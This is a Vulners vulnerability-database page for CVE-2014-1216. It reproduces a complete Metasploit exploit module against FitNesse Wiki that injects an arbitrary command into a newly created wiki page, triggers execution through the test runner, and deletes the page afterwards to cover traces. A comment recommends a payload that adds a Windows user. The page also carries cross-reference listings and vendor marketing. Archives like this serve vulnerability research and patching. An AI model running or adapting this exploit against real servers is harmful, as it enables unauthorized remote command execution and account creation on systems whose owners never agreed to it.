Vulners
Lucene search
Fitnesse Wiki Remote Command Execution Vulnerability
| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
 | Fitnesse Wiki 20131110 Remote Command Execution | 2 Mar 201400:00 | – | zdt |
 | CVE-2014-1216 | 28 Mar 201400:00 | – | circl |
 | CVE-2014-1216 | 21 Apr 201414:00 | – | cve |
 | CVE-2014-1216 | 21 Apr 201414:00 | – | cvelist |
 | Fitnesse Wiki - Remote Command Execution (Metasploit) | 28 Mar 201400:00 | – | exploitdb |
 | EUVD-2022-4606 | 3 Oct 202520:07 | – | euvd |
 | Fitnesse Wiki - Remote Command Execution (Metasploit) | 28 Mar 201400:00 | – | exploitpack |
 | Improper Neutralization of Special Elements used in a Command in FitNesse Wiki | 17 May 202204:46 | – | github |
 | CVE-2014-1216 | 22 Apr 201413:06 | – | nvd |
 | Fitnesse Wiki RCE Vulnerability | 17 Mar 201400:00 | – | openvas |
10
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Fitnesse Wiki Remote Command Execution',
'Description' => %q{
This module exploits a vulnerability found in Fitnesse Wiki, version 20140201
and earlier.
},
'Author' =>
[
'Jerzy Kramarz', ## Vulnerability discovery
'Veerendra G.G <veerendragg {at} secpod.com>', ## Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-1216' ],
[ 'OSVDB', '103907' ],
[ 'BID', '65921' ],
[ 'URL', 'http://secpod.org/blog/?p=2311' ],
[ 'URL', 'http://secpod.org/msf/fitnesse_wiki_rce.rb' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Mar/1' ],
[ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1216/' ]
],
'Privileged' => false,
'Payload' =>
{
'Space' => 1000,
'BadChars' => "",
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd', ##
##'RequiredCmd' => 'generic telnet',
## payloads cmd/windows/adduser and cmd/windows/generic works perfectly
}
},
'Platform' => %w{ win },
'Arch' => ARCH_CMD,
'Targets' =>
[
['Windows', { 'Platform' => 'win' } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 25 2014'))
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [true, 'Fitnesse Wiki base path', '/'])
], self.class)
end
def check
print_status("#{peer} - Trying to detect Fitnesse Wiki")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
})
if res && res.code == 200 && res.body.include?(">FitNesse<")
print_good("#{peer} - FitNesse Wiki Detected!")
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def http_send_command(command)
## Construct random page in WikiWord format
uri = normalize_uri(target_uri.path, 'TestP' + rand_text_alpha_lower(7))
res = send_request_cgi({
'method' => 'GET',
'uri' => uri + "?edit"
})
if !res || res.code != 200
fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!")
end
print_status("#{peer} - Retrieving edit time and ticket id")
## Get Edit Time and Ticket Id from the response
res.body =~ /"editTime" value="((\d)+)"/
edit_time = $1
res.body =~ /"ticketId" value="((-?\d)+)"/
ticket_id = $1
## Validate we are able to extract Edit Time and Ticket Id
if !edit_time or !ticket_id
print_error("#{peer} - Failed to get Ticket Id / Edit Time.")
return
end
print_status("#{peer} - Attempting to create '#{uri}'")
## Construct Referer
referer = "http://#{rhost}:#{rport}" + uri + "?edit"
## Construct command to be executed
page_content = '!define COMMAND_PATTERN {%m}
!define TEST_RUNNER {' + command + '}'
print_status("#{peer} - Injecting the payload")
## Construct POST request to create page with malicious commands
## inserted in the page
res = send_request_cgi(
{
'uri' => uri,
'method' => 'POST',
'headers' => {'Referer' => referer},
'vars_post' =>
{
'editTime' => edit_time,
'ticketId' => ticket_id,
'responder' => 'saveData',
'helpText' => '',
'suites' => '',
'__EDITOR__1' => 'textarea',
'pageContent' => page_content,
'save' => 'Save',
}
})
if res && res.code == 303
print_status("#{peer} - Successfully created '#{uri}' with payload")
end
## Execute inserted command
print_status("#{peer} - Sending exploit request")
res = send_request_cgi({
'method' => 'GET',
'uri' => uri + "?test"
})
if res && res.code == 200
print_status("#{peer} - Successfully sent exploit request")
end
## Cleanup by deleting the created page
print_status("#{peer} - Execting cleanup routine")
referer = "http://#{rhost}:#{rport}" + uri + "?deletePage"
res = send_request_cgi(
{
'uri' => uri + "?deletePage",
'method' => 'POST',
'headers' => {'Referer' => referer},
'vars_post' =>
{
'confirmed' => 'Yes',
}
})
end
def exploit
http_send_command(payload.encoded)
end
end
# 0day.today [2018-01-02] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Mar 2014 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.06575